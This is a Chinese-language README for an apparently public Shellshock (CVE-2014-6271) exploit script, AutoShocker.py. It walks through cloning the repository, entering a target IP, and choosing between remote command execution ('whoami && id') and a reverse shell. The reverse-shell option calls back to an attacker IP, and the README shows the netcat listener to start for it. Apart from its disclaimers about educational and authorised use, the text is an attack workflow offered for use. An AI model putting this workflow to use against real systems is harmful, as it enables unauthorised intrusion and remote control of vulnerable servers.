本 Python 脚本利用 Shellshock 漏洞(CVE-2014-6271)在易受攻击的目标上远程执行命令或建立反向 shell。🛠️⚠️
此脚本仅用于教育目的和授权的渗透测试。未经明确许可对您无权测试的系统进行未经授权的使用是非法且不道德的。在进行任何安全测试之前,请务必获得适当授权。⚠️🛑🚔
curl。克隆仓库:
git clone https://github.com/YunchoHang/CVE-2014-6271-SHELLSHOCK.git
cd CVE-2014-6271-SHELLSHOCK
运行脚本:
python3 AutoShocker.py
python3 AutoShocker.py
Enter the target IP: 192.168.1.100
Choose an option (1 or 2): 1
Enter the commands you want to execute: whoami && id
python3 AutoShocker.py
Enter the target IP: 192.168.1.100
Choose an option (1 or 2): 2
Enter your IP (listener): 192.168.1.200
Enter the port for reverse shell (e.g., 4444): 4444
在您的机器上启动监听器:
nc -lvnp 4444
本项目仅用于教育目的。作者对任何滥用行为概不负责。📖⚠️🔍